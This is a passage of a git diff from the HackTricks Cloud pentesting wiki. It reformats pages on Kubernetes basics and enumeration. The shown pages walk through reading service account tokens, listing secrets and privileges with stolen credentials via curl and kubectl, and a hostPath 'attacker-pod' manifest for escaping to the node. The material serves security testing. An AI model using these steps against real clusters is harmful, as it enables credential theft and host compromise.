-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-basics.md b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
similarity index 71%
rename from pentesting-cloud/kubernetes-security/kubernetes-basics.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
index 61bfad269..1625346aa 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-basics.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md
@@ -2,20 +2,7 @@
 
 ## Kubernetes Basics
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 **The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**
 
@@ -23,30 +10,30 @@ Learn & practice GCP Hacking:  [!NOTE]
+> This is useful for testing but for production you should have only internal services and an Ingress to expose the application.
 
 **Example of Ingress config file**
 
@@ -265,12 +251,12 @@ metadata:
   namespace: kubernetes-dashboard
 spec:
   rules:
-  - host: dashboard.com
-    http:
-      paths:
-      - backend:
-          serviceName: kubernetes-dashboard
-          servicePort: 80
+    - host: dashboard.com
+      http:
+        paths:
+          - backend:
+              serviceName: kubernetes-dashboard
+              servicePort: 80
 ```
 
 **Example of secrets config file**
@@ -281,11 +267,11 @@ Note how the password are encoded in B64 (which isn't secure!)
 apiVersion: v1
 kind: Secret
 metadata:
-    name: mongodb-secret
+  name: mongodb-secret
 type: Opaque
 data:
-    mongo-root-username: dXNlcm5hbWU=
-    mongo-root-password: cGFzc3dvcmQ=
+  mongo-root-username: dXNlcm5hbWU=
+  mongo-root-password: cGFzc3dvcmQ=
 ```
 
 **Example of ConfigMap**
@@ -317,7 +303,7 @@ spec:
         - containerPort: 8081
         env:
         - name: ME_CONFIG_MONGODB_SERVER
-          valueFrom: 
+          valueFrom:
             configMapKeyRef:
               name: mongodb-configmap
               key: database_url
@@ -346,24 +332,23 @@ kube-public       Active   1d
 kube-system       Active   1d
 ```
 
-* **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes.
-* **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information
-* **kube-node-lease**: Determines the availability of a node
-* **default**: The namespace the user will use to create resources
+- **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes.
+- **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information
+- **kube-node-lease**: Determines the availability of a node
+- **default**: The namespace the user will use to create resources
 
 ```bash
 #Create namespace
 kubectl create namespace my-namespace
 ```
 
-{% hint style="info" %}
-Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace:
-
-```bash
-kubectl api-resources --namespaced=true #In a namespace
-kubectl api-resources --namespaced=false #Not in a namespace
-```
-{% endhint %}
+> [!NOTE]
+> Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace:
+>
+> ```bash
+> kubectl api-resources --namespaced=true #In a namespace
+> kubectl api-resources --namespaced=false #Not in a namespace
+> ```
 
 You can save the namespace for all subsequent kubectl commands in that context.
 
@@ -387,11 +372,11 @@ A **Secret** is an object that **contains sensitive data** such as a password, a
 
 Secrets might be things like:
 
-* API, SSH Keys.
-* OAuth tokens.
-* Credentials, Passwords (plain text or b64 + encryption).
-* Information or comments.
-* Database connection code, strings… .
+- API, SSH Keys.
+- OAuth tokens.
+- Credentials, Passwords (plain text or b64 + encryption).
+- Information or comments.
+- Database connection code, strings… .
 
 There are different types of secrets in Kubernetes
 
@@ -406,9 +391,8 @@ There are different types of secrets in Kubernetes
 | kubernetes.io/tls                   | data for a TLS client or server           |
 | bootstrap.kubernetes.io/token       | bootstrap token data                      |
 
-{% hint style="info" %}
-**The Opaque type is the default one, the typical key-value pair defined by users.**
-{% endhint %}
+> [!NOTE]
+> **The Opaque type is the default one, the typical key-value pair defined by users.**
 
 **How secrets works:**
 
@@ -416,8 +400,7 @@ There are different types of secrets in Kubernetes
 
 The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME` \_\_ and \_\_ `SECRET_PASSWOR`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions.
 
-{% code title="secretpod.yaml" %}
-```yaml
+```yaml:secretpod.yaml
 apiVersion: v1
 kind: Secret
 metadata:
@@ -433,33 +416,32 @@ metadata:
   name: secretpod
 spec:
   containers:
-  - name: secretpod
-    image: nginx
-    env:
-      - name: SECRET_USERNAME
-        valueFrom:
-          secretKeyRef:
-            name: mysecret
-            key: username
-      - name: SECRET_PASSWORD
-        valueFrom:
-          secretKeyRef:
-            name: mysecret
-            key: password
-    volumeMounts:
-    - name: foo
-      mountPath: "/etc/foo"
+    - name: secretpod
+      image: nginx
+      env:
+        - name: SECRET_USERNAME
+          valueFrom:
+            secretKeyRef:
+              name: mysecret
+              key: username
+        - name: SECRET_PASSWORD
+          valueFrom:
+            secretKeyRef:
+              name: mysecret
+              key: password
+      volumeMounts:
+        - name: foo
+          mountPath: "/etc/foo"
   restartPolicy: Never
   volumes:
-  - name: foo
-    secret:
-      secretName: mysecret
-      items:
-      - key: username
-        path: my-group/my-username
-        mode: 0640
+    - name: foo
+      secret:
+        secretName: mysecret
+        items:
+          - key: username
+            path: my-group/my-username
+            mode: 0640
 ```
-{% endcode %}
 
 ```bash
 kubectl apply -f 
@@ -496,29 +478,27 @@ ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key
 
 By default all the secrets are **stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
 
-{% code title="encryption.yaml" %}
-```yaml
+```yaml:encryption.yaml
 apiVersion: apiserver.config.k8s.io/v1
 kind: EncryptionConfiguration
 resources:
   - resources:
-    - secrets
+      - secrets
     providers:
-    - aescbc:
-        keys:
-        - name: key1
-          secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= #Any random key
-    - identity: {}
+      - aescbc:
+          keys:
+            - name: key1
+              secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= #Any random key
+      - identity: {}
 ```
-{% endcode %}
 
 After that, you need to set the `--encryption-provider-config` flag on the `kube-apiserver` to point to the location of the created config file. You can modify `/etc/kubernetes/manifest/kube-apiserver.yaml` and add the following lines:
 
 ```yaml
-  containers:
+containers:
   - command:
-    - kube-apiserver
-    - --encriyption-provider-config=/etc/kubernetes/etcd/
+      - kube-apiserver
+      - --encriyption-provider-config=/etc/kubernetes/etcd/
 ```
 
 Scroll down in the volumeMounts:
@@ -547,12 +527,14 @@ Data is encrypted when written to etcd. After restarting your `kube-apiserver`,
     ```
     kubectl create secret generic secret1 -n default --from-literal=mykey=mydata
     ```
+
 2.  Using the etcdctl commandline, read that secret out of etcd:
 
     `ETCDCTL_API=3 etcdctl get /registry/secrets/default/secret1 [...] | hexdump -C`
 
     where `[...]` must be the additional arguments for connecting to the etcd server.
-3. Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data.
+
+3.  Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data.
 4.  Verify the secret is correctly decrypted when retrieved via the API:
 
     ```
@@ -569,28 +551,19 @@ kubectl get secrets --all-namespaces -o json | kubectl replace -f -
 
 **Final tips:**
 
-* Try not to keep secrets in the FS, get them from other places.
-* Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.
-* [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
-* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm)
+- Try not to keep secrets in the FS, get them from other places.
+- Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.
+- [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
+- [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm)
 
 ## References
 
-{% embed url="https://sickrov.github.io/" %}
+{{#ref}}
+https://sickrov.github.io/
+{{#endref}}
 
-{% embed url="https://www.youtube.com/watch?v=X48VuDVv0do" %}
+{{#ref}}
+https://www.youtube.com/watch?v=X48VuDVv0do
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
similarity index 70%
rename from pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
index 358bdee06..10490838c 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -1,19 +1,6 @@
 # Kubernetes Enumeration
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Kubernetes Tokens
 
@@ -36,15 +23,15 @@ Every service account has a secret related to it and this secret contains a bear
 
 Usually **one** of the directories:
 
-* `/run/secrets/kubernetes.io/serviceaccount`
-* `/var/run/secrets/kubernetes.io/serviceaccount`
-* `/secrets/kubernetes.io/serviceaccount`
+- `/run/secrets/kubernetes.io/serviceaccount`
+- `/var/run/secrets/kubernetes.io/serviceaccount`
+- `/secrets/kubernetes.io/serviceaccount`
 
 contain the files:
 
-* **ca.crt**: It's the ca certificate to check kubernetes communications
-* **namespace**: It indicates the current namespace
-* **token**: It contains the **service token** of the current pod.
+- **ca.crt**: It's the ca certificate to check kubernetes communications
+- **namespace**: It indicates the current namespace
+- **token**: It contains the **service token** of the current pod.
 
 Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**. For more info run `(env | set) | grep -i "kuber|kube`**`"`**
 
@@ -52,11 +39,11 @@ The service account token is being signed by the key residing in the file **sa.k
 
 Default location on **Kubernetes**:
 
-* /etc/kubernetes/pki
+- /etc/kubernetes/pki
 
 Default location on **Minikube**:
 
-* /var/lib/localkube/certs
+- /var/lib/localkube/certs
 
 ### Hot Pods
 
@@ -68,16 +55,16 @@ If you don't know what is **RBAC**, **read this section**.
 
 ## GUI Applications
 
-* **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Write `:namespace` and select all to then search resources in all the namespaces.
-* **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/)
+- **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Write `:namespace` and select all to then search resources in all the namespaces.
+- **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/)
 
 ## Enumeration CheatSheet
 
 In order to enumerate a K8s environment you need a couple of this:
 
-* A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
-* The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file.
-* **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this.
+- A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
+- The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file.
+- **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this.
 
 With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host.
 
@@ -112,9 +99,8 @@ GET /apis/apps/v1/watch/deployments  [DEPRECATED]
 
 They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created).
 
-{% hint style="danger" %}
-The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
-{% endhint %}
+> [!CAUTION]
+> The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
 
 ### Using curl
 
@@ -130,9 +116,8 @@ alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
 # if kurl is still got cert Error, using -k option to solve this.
 ```
 
-{% hint style="warning" %}
-By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).
-{% endhint %}
+> [!WARNING]
+> By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).
 
 ### Using kubectl
 
@@ -140,11 +125,9 @@ Having the token and the address of the API server you use kubectl or curl to ac
 
 By default, The APISERVER is communicating with `https://` schema
 
-{% code overflow="wrap" %}
 ```bash
 alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces
 ```
-{% endcode %}
 
 > if no `https://` in url, you may get Error Like Bad Request.
 
@@ -165,8 +148,9 @@ kubectl get namespace --insecure-skip-tls-verify=true
 
 ### Current Configuration
 
-{% tabs %}
-{% tab title="Kubectl" %}
+{{#tabs }}
+{{#tab name="Kubectl" }}
+
 ```bash
 kubectl config get-users
 kubectl config get-contexts
@@ -176,8 +160,9 @@ kubectl config current-context
 # Change namespace
 kubectl config set-context --current --namespace=
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 If you managed to steal some users credentials you can **configure them locally** using something like:
 
@@ -196,19 +181,22 @@ kubectl config set-credentials USER_NAME \
 
 With this info you will know all the services you can list
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k api-resources --namespaced=true #Resources specific to a namespace
 k api-resources --namespaced=false #Resources NOT specific to a namespace
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get Current Privileges
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k auth can-i --list #Get privileges in general
 k auth can-i --list -n custnamespace #Get privileves in custnamespace
@@ -216,86 +204,101 @@ k auth can-i --list -n custnamespace #Get privileves in custnamespace
 # Get service account permissions
 k auth can-i --list --as=system:serviceaccount:: -n 
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -i -s -k -X $'POST' \
     -H $'Content-Type: application/json' \
     --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
     "https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 Another way to check your privileges is using the tool: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)\*\*\*\*
 
 You can learn more about **Kubernetes RBAC** in:
 
-{% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
-[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
-{% endcontent-ref %}
+{{#ref}}
+kubernetes-role-based-access-control-rbac.md
+{{#endref}}
 
 **Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
 
-{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
-[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
-{% endcontent-ref %}
+{{#ref}}
+abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
 
 ### Get Others roles
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get roles
 k get clusterroles
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
 kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500"
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get namespaces
 
 Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get namespaces
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -k -v https://$APISERVER/api/v1/namespaces/
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get secrets
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get secrets -o yaml
 k get secrets -o yaml -n custnamespace
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
 
 kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 If you can read secrets you can use the following lines to get the privileges related to each to token:
 
@@ -307,190 +310,230 @@ for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f
 
 As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get serviceaccounts
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get Deployments
 
 The deployments specify the **components** that need to be **run**.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get deployments
 k get deployments -n custnamespace
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -v https://$APISERVER/api/v1/namespaces//deployments/
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get Pods
 
 The Pods are the actual **containers** that will **run**.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get pods
 k get pods -n custnamespace
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -v https://$APISERVER/api/v1/namespaces//pods/
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get Services
 
 Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get services
 k get services -n custnamespace
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -v https://$APISERVER/api/v1/namespaces/default/services/
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get nodes
 
 Get all the **nodes configured inside the cluster**.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get nodes
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -v https://$APISERVER/api/v1/nodes/
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get DaemonSets
 
 **DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get daemonsets
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get cronjob
 
 Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get cronjobs
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
 kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces//cronjobs
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get configMap
 
 configMap always contains a lot of information and configfile that provide to apps which run in the kubernetes. Usually You can find a lot of password, secrets, tokens which used to connecting and validating to other internal/external service.
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get configmaps # -n namespace
 ```
-{% endtab %}
 
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
 ```bash
-kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps 
+kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get Network Policies / Cilium Network Policies
 
-{% tabs %}
-{% tab title="First Tab" %}
+{{#tabs }}
+{{#tab name="First Tab" }}
+
 ```bash
 k get networkpolicies
 k get CiliumNetworkPolicies
 k get CiliumClusterwideNetworkPolicies
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Get Everything / All
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get all
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### **Get all resources managed by helm**
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### **Get Pods consumptions**
 
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
 ```bash
 k top pod --all-namespaces
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Escaping from the pod
 
@@ -518,22 +561,22 @@ metadata:
   namespace: default
 spec:
   volumes:
-  - name: host-fs
-    hostPath:
-      path: /
+    - name: host-fs
+      hostPath:
+        path: /
   containers:
-  - image: ubuntu
-    imagePullPolicy: Always
-    name: attacker-pod
-    command: ["/bin/sh", "-c", "sleep infinity"]
-    volumeMounts:
-      - name: host-fs
-        mountPath: /root
+    - image: ubuntu
+      imagePullPolicy: Always
+      name: attacker-pod
+      command: ["/bin/sh", "-c", "sleep infinity"]
+      volumeMounts:
+        - name: host-fs
+          mountPath: /root
   restartPolicy: Never
   # nodeName and nodeSelector enable one of them when you need to create pod on the specific node
   #nodeName: master
   #nodeSelector:
-  #  kubernetes.io/hostname: master 
+  #  kubernetes.io/hostname: master
   # or using
   #  node-role.kubernetes.io/master: ""
 ```
@@ -562,19 +605,8 @@ Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Pa
 
 ## References
 
-{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
+{{#ref}}
+https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
similarity index 83%
